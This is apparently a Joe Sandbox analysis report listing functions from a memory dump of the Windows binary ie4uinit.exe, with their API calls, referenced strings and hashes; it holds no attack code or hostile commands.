Instruction Fuzzy Hash: C051E572A06B5586DB54CF29EA042AA77A0FB48F84F184135DF4D83759DF3AE8A7C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5227C38 Relevance: 7.6, APIs: 5, Instructions: 104encryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6B5227C73
CertGetCertificateChain.CRYPT32 ref: 00007FF6B5227CAA
CertFreeCertificateChain.CRYPT32 ref: 00007FF6B5227D8C

Part of subcall function 00007FF6B5216638: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6B521B2D5), ref: 00007FF6B5216650

CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF6B5227D0B

Part of subcall function 00007FF6B522210C: #796.IERTUTIL ref: 00007FF6B5222167

CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF6B5227D38

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CertCertificateChain$OncePolicyVerify$#796ExecuteFreeInitmemset
String ID:
API String ID: 2708282856-0
Opcode ID: 6222e5d623cf8afac12bdf665af0bc9cc8e201cb3221b33959cf6b94676be33f
Instruction ID: 751f0280f46cfd8530f9a558a8043d2b90767b948a0defc914ec3b74425dc9a8
Opcode Fuzzy Hash: 6222e5d623cf8afac12bdf665af0bc9cc8e201cb3221b33959cf6b94676be33f
Instruction Fuzzy Hash: 3D415F36A29A4299E720CF29D9407FD33A5FB84B48F544035DB4C9765EDF7AE905CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522530C Relevance: 7.6, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B52262D9), ref: 00007FF6B5225364
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B52262D9), ref: 00007FF6B5225414

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B52262D9), ref: 00007FF6B52253B2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B52262D9), ref: 00007FF6B52253C9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6B52262D9), ref: 00007FF6B52253DD

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ByteCharMultiWide$HeapProcess
String ID:
API String ID: 1962985005-0
Opcode ID: df0a9a40585e8bdf9b15f104619403c70f311ef90464d39010696612a9c10158
Instruction ID: fa44ec0b6cdc8f03fb56696e5c6ff1acb5664570bc07ad4b80dd89893133c452
Opcode Fuzzy Hash: df0a9a40585e8bdf9b15f104619403c70f311ef90464d39010696612a9c10158
Instruction Fuzzy Hash: 7931A035B0AB5285E7109F59EE802B972A8AF84F81B548134CB4DDB35ADF7DE8118340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521F860 Relevance: 7.6, APIs: 5, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF6B521F8AC
GetLastError.KERNEL32 ref: 00007FF6B521F8B9
GetLastError.KERNEL32 ref: 00007FF6B521F8CD
GetLastError.KERNEL32 ref: 00007FF6B521F8DD
ReleaseMutex.KERNEL32 ref: 00007FF6B521F900

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$MutexObjectReleaseSingleWait
String ID:
API String ID: 3488842590-0
Opcode ID: 42fab01a522395885f2275800fda257a738126e11f7e3ab6a5587141e2c4ccb0
Instruction ID: b499aaca401a4a5ce86c1a0068f123f16cc043a0cc431bfe72b8af51829d309f
Opcode Fuzzy Hash: 42fab01a522395885f2275800fda257a738126e11f7e3ab6a5587141e2c4ccb0
Instruction Fuzzy Hash: BC31622270AB8195EB209F2AEED42AA6364FF48F90F440135CB5EC765ADF3DED418250

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52300F4 Relevance: 7.6, APIs: 5, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

CloseHandle.KERNEL32 ref: 00007FF6B5230168
SetFileAttributesW.KERNEL32 ref: 00007FF6B523017A
#85.IERTUTIL ref: 00007FF6B523019E
CloseHandle.KERNEL32 ref: 00007FF6B52301C0
SetFileAttributesW.KERNEL32 ref: 00007FF6B52301D2

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: AttributesCloseFileHandle$HeapProcess
String ID:
API String ID: 3375093513-0
Opcode ID: 88b65d0b7aa516ab8de9520ea4a4b3089a1027aa95222fb823b89ec20402a3e6
Instruction ID: 9d964499a454dc8947d127661d9592430a8a707db901abcce49b941ccdc75ceb
Opcode Fuzzy Hash: 88b65d0b7aa516ab8de9520ea4a4b3089a1027aa95222fb823b89ec20402a3e6
Instruction Fuzzy Hash: FE316022A066528AE6298B19DE400B97265AB84FF0F584331CF79977DADF3CEC528350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52115A0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6B52115E9
VerSetConditionMask.KERNEL32 ref: 00007FF6B5211603
VerSetConditionMask.KERNEL32 ref: 00007FF6B5211612
VerSetConditionMask.KERNEL32 ref: 00007FF6B5211621
VerifyVersionInfoW.KERNEL32 ref: 00007FF6B5211642

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 24634ab96e0a26391b052a00890e977940e7de106a0a9b43cc071abaa170081e
Instruction ID: efafaf4cb40c1ab7ab2ce86d87bd171698acf4442f2fb97dabcac908a906b256
Opcode Fuzzy Hash: 24634ab96e0a26391b052a00890e977940e7de106a0a9b43cc071abaa170081e
Instruction Fuzzy Hash: 66216D32609B418AD720CF21EA802DA73A5FB8CB44F045526EB8D87B18EF3CE559CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522F73C Relevance: 7.5, APIs: 5, Instructions: 41encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B522F540: #690.IERTUTIL ref: 00007FF6B522F5A1
Part of subcall function 00007FF6B522F540: wcsncmp.MSVCRT ref: 00007FF6B522F5C1
Part of subcall function 00007FF6B522F540: RegOpenKeyExW.ADVAPI32 ref: 00007FF6B522F5F0
Part of subcall function 00007FF6B522F540: RegCreateKeyExW.ADVAPI32 ref: 00007FF6B522F62F
Part of subcall function 00007FF6B522F540: CertOpenStore.CRYPT32 ref: 00007FF6B522F655
Part of subcall function 00007FF6B522F540: RegCloseKey.ADVAPI32 ref: 00007FF6B522F69E
Part of subcall function 00007FF6B522F540: RegCloseKey.ADVAPI32 ref: 00007FF6B522F6A9

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF6B522F76A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B522E986,?,?,00007FF6B522E79F), ref: 00007FF6B522F778
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B522E986,?,?,00007FF6B522E79F), ref: 00007FF6B522F78C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B522E986,?,?,00007FF6B522E79F), ref: 00007FF6B522F79B
CertCloseStore.CRYPT32 ref: 00007FF6B522F7B6

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CertCloseErrorLastStore$Open$#690CertificatesCreateEnumwcsncmp
String ID:
API String ID: 3604553212-0
Opcode ID: f278cb8874a6ecabdce908ae38f5159b1ffb7473c27bdf819d2fe56589dbc616
Instruction ID: 0f8f4aa8653f495c9dd0f196985ef71a3c4de0d0d82b771ebf8b7378c378d18b
Opcode Fuzzy Hash: f278cb8874a6ecabdce908ae38f5159b1ffb7473c27bdf819d2fe56589dbc616
Instruction Fuzzy Hash: 49019626B2AB8246E7505B29DEC57B52294AF88F40F440034D70EC515AEF7DE8414300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5224EB4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5224C30: CreateUri.URLMON ref: 00007FF6B5224C7A
Part of subcall function 00007FF6B5224C30: SysFreeString.OLEAUT32 ref: 00007FF6B5224CE7

CreateIUriBuilder.URLMON(?,00000000,?,00007FF6B522170F), ref: 00007FF6B5224F1B
UrlEscapeW.SHLWAPI(?,00000000,?,00007FF6B522170F), ref: 00007FF6B5224F46
SysFreeString.OLEAUT32 ref: 00007FF6B522516B

Strings

%.*s%s%s=%s%.*s, xrefs: 00007FF6B5225069

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CreateFreeString$BuilderEscape
String ID: %.*s%s%s=%s%.*s
API String ID: 1165466252-2473103020
Opcode ID: 6d7572b0c117f67bce9aa499076de472f22147e7b99f96fc3b5de367a3060f71
Instruction ID: 5d57463029847b2b2387c39c88ee80e8afe97e213354035135084f195d552429
Opcode Fuzzy Hash: 6d7572b0c117f67bce9aa499076de472f22147e7b99f96fc3b5de367a3060f71
Instruction Fuzzy Hash: 72917E36B1AB4286EB208F2AE9801AD67B0FB84F94F504131DB4D97B69DF3DD945CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522B414 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B522B8DC: #791.IERTUTIL(?,?,?,?,00000000,?,?,00007FF6B522B44E), ref: 00007FF6B522B92D
Part of subcall function 00007FF6B522B8DC: CreateFileW.KERNEL32 ref: 00007FF6B522B95C
Part of subcall function 00007FF6B522B8DC: GetLastError.KERNEL32 ref: 00007FF6B522B965

memset.MSVCRT ref: 00007FF6B522B465

Part of subcall function 00007FF6B522B9DC: GetFullPathNameW.KERNEL32 ref: 00007FF6B522BA1B
Part of subcall function 00007FF6B522B9DC: LCMapStringW.KERNEL32 ref: 00007FF6B522BA56

OpenMutexW.KERNEL32 ref: 00007FF6B522B4F8

Strings

Local\IEHistJournalFm_24c20119-753b-4f33-887d-f2381810562d_, xrefs: 00007FF6B522B4D0
Local\IEHistJournalMx_1699bb90-bebe-4437-b6e8-a6b7123fa38e_, xrefs: 00007FF6B522B497

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #791CreateErrorFileFullLastMutexNameOpenPathStringmemset
String ID: Local\IEHistJournalFm_24c20119-753b-4f33-887d-f2381810562d_$Local\IEHistJournalMx_1699bb90-bebe-4437-b6e8-a6b7123fa38e_
API String ID: 2964615453-223612499
Opcode ID: 276970e6b221db6115c4e23632d308c275b5b1c0209c6be63b8d97412e30a727
Instruction ID: 76c41bc13398fb82dc3de99cf2f4da6e984b556a5fb803c343f445eef209221b
Opcode Fuzzy Hash: 276970e6b221db6115c4e23632d308c275b5b1c0209c6be63b8d97412e30a727
Instruction Fuzzy Hash: 2B319669729B4246F7119769AE903EA6394EB88B84F400039EB4DCB74BDF3DED15C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522AB4C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

#791.IERTUTIL ref: 00007FF6B522AB78
#660.IERTUTIL ref: 00007FF6B522AB8E

Part of subcall function 00007FF6B5216830: #652.IERTUTIL ref: 00007FF6B5216880

#660.IERTUTIL ref: 00007FF6B522AC3B

Strings

Low, xrefs: 00007FF6B522AC00

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #660$#652#791
String ID: Low
API String ID: 1912657141-2865053249
Opcode ID: a500bf24549718c282f80f127db396efec8e3d8757445154704b74e6f5f4c58c
Instruction ID: 44aa366a4cb1a6326d3212c4c318ba843f6587c7484e0e92195b37278f75370e
Opcode Fuzzy Hash: a500bf24549718c282f80f127db396efec8e3d8757445154704b74e6f5f4c58c
Instruction Fuzzy Hash: 57313062B29A9347F7209B59EE513FA6354AF84B44F840031DB4DC7A9BEF7DE8058740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5218678 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

iswalpha.MSVCRT ref: 00007FF6B521869C
wcsncmp.MSVCRT(?,?,?,00007FF6B5218DBB,?,?,?,?,?,?,?,?,Software\Microsoft\Windows\CurrentVersion\Policies,?,00000104,?), ref: 00007FF6B521871D
iswalpha.MSVCRT ref: 00007FF6B521872B

Strings

\\?\, xrefs: 00007FF6B5218713

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: iswalpha$wcsncmp
String ID: \\?\
API String ID: 1827288291-4282027825
Opcode ID: 4d9da8a1aef5fb8476243ff63823dfeb54b1c5ac86231e3aebaca5654d4a0110
Instruction ID: 9075b0c3d9ab483fdee44a49f199f4b4f70ca133928f63bdd90d316f9b02bb58
Opcode Fuzzy Hash: 4d9da8a1aef5fb8476243ff63823dfeb54b1c5ac86231e3aebaca5654d4a0110
Instruction Fuzzy Hash: 0E314119A1A26241FAA49B19DF912FB63A0EF41F84F488035CB0AC65DFDF7EEC45C640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5218A08 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5219508: wcschr.MSVCRT ref: 00007FF6B521951A
Part of subcall function 00007FF6B5219508: wcschr.MSVCRT ref: 00007FF6B5219531
Part of subcall function 00007FF6B5219508: wcschr.MSVCRT ref: 00007FF6B5219546

wcsncmp.MSVCRT ref: 00007FF6B5218A3C

Strings

.lnk, xrefs: 00007FF6B5218A91
\, xrefs: 00007FF6B5218A6B
\\?\, xrefs: 00007FF6B5218A35

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: wcschr$wcsncmp
String ID: .lnk$\$\\?\
API String ID: 511192645-3340180466
Opcode ID: c8b792e7e35bf87c5f4b77d69f25b7843d97a8029a105e82920660a84f0e608e
Instruction ID: 145ae5a9ee937299a0182ea59b940599c22fd0e5b4548029fc7d67dd1679a717
Opcode Fuzzy Hash: c8b792e7e35bf87c5f4b77d69f25b7843d97a8029a105e82920660a84f0e608e
Instruction Fuzzy Hash: FB219712B0A65682EEA04B59EA842FA6291DB00FC4F588131D74DC769EDE3EEC809301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5218540 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF6B5218B53,?,?,?,?,?,?,?,?,Software\Microsoft\Windows\CurrentVersion\Policies,?,00000104,?), ref: 00007FF6B52185A6
GetProcAddress.KERNEL32(?,?,?,00007FF6B5218B53,?,?,?,?,?,?,?,?,Software\Microsoft\Windows\CurrentVersion\Policies,?,00000104,?), ref: 00007FF6B52185B6

Strings

ntdll.dll, xrefs: 00007FF6B521859F
RtlAreLongPathsEnabled, xrefs: 00007FF6B52185AF

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlAreLongPathsEnabled$ntdll.dll
API String ID: 1646373207-3809284139
Opcode ID: 5df8364a9b96c421149b5bdbe66fe287014291ff9ec811eb560b8f225c86d878
Instruction ID: 875f7252403d9e10ca4e1da25287a897354473a502fbbf41af828d1183425d29
Opcode Fuzzy Hash: 5df8364a9b96c421149b5bdbe66fe287014291ff9ec811eb560b8f225c86d878
Instruction Fuzzy Hash: DE114261F1B61296FFE5871DDEA02FA1391DF54F40F654035CA0D8639AEE3EEC448640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521B4A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetUserPreferredUILanguages.KERNEL32(?,?,00000000,00007FF6B521B44F,?,?,00000000,00007FF6B521B0F8), ref: 00007FF6B521B4C6

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

memset.MSVCRT ref: 00007FF6B521B509
GetUserPreferredUILanguages.KERNEL32(?,?,00000000,00007FF6B521B44F,?,?,00000000,00007FF6B521B0F8), ref: 00007FF6B521B522

Strings

zh-cn, xrefs: 00007FF6B521B533

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: LanguagesPreferredUser$HeapProcessmemset
String ID: zh-cn
API String ID: 2582354708-1604153623
Opcode ID: 7ee6c1943639825eb2e52bb2f11b609ee6ff4c0d130ed8ac168857d6fb2ef0d4
Instruction ID: 3ca462dda3937351b7aaddbda105dc44f809651e2c156682d4a0867ba8d9751a
Opcode Fuzzy Hash: 7ee6c1943639825eb2e52bb2f11b609ee6ff4c0d130ed8ac168857d6fb2ef0d4
Instruction Fuzzy Hash: 2F11A532B152818AEF54DF69DAC05E977A0EB84F80B44503ADB0A8775EDE39ED49CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5214CB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF6B5214CFA

Part of subcall function 00007FF6B5211394: _vsnwprintf.MSVCRT ref: 00007FF6B52113D4

RegCloseKey.ADVAPI32 ref: 00007FF6B5214D62

Strings

Software\Classes\Local Settings\MuiCache, xrefs: 00007FF6B5214CF0
@%s, xrefs: 00007FF6B5214D07

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseOpen_vsnwprintf
String ID: @%s$Software\Classes\Local Settings\MuiCache
API String ID: 2342809593-1369442998
Opcode ID: d54a0a893a90c79697a78fc8bab0873cac23001ac8187c86edf1074a7fd70ea2
Instruction ID: 8f3db34273df7bea89384e3f286acf65b4c19ce499df4023fac6c3ab92271397
Opcode Fuzzy Hash: d54a0a893a90c79697a78fc8bab0873cac23001ac8187c86edf1074a7fd70ea2
Instruction Fuzzy Hash: 79118421B1A69182EE209B19EE443E76360EF89F84F440131DB5D87B9EDE3DE9058740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5224B80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

StrCmpICW.SHLWAPI(?,?,?,00007FF6B5224C5D), ref: 00007FF6B5224BC2
SysAllocString.OLEAUT32 ref: 00007FF6B5224BF9

Strings

about:home, xrefs: 00007FF6B5224BB8
about:blank, xrefs: 00007FF6B5224BD1

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: AllocString
String ID: about:blank$about:home
API String ID: 2525500382-1158670746
Opcode ID: e3cf35c908b69a1a4c1a49ac493ed38e4b0f64ff1d8b174bb225fd4f1426a9cc
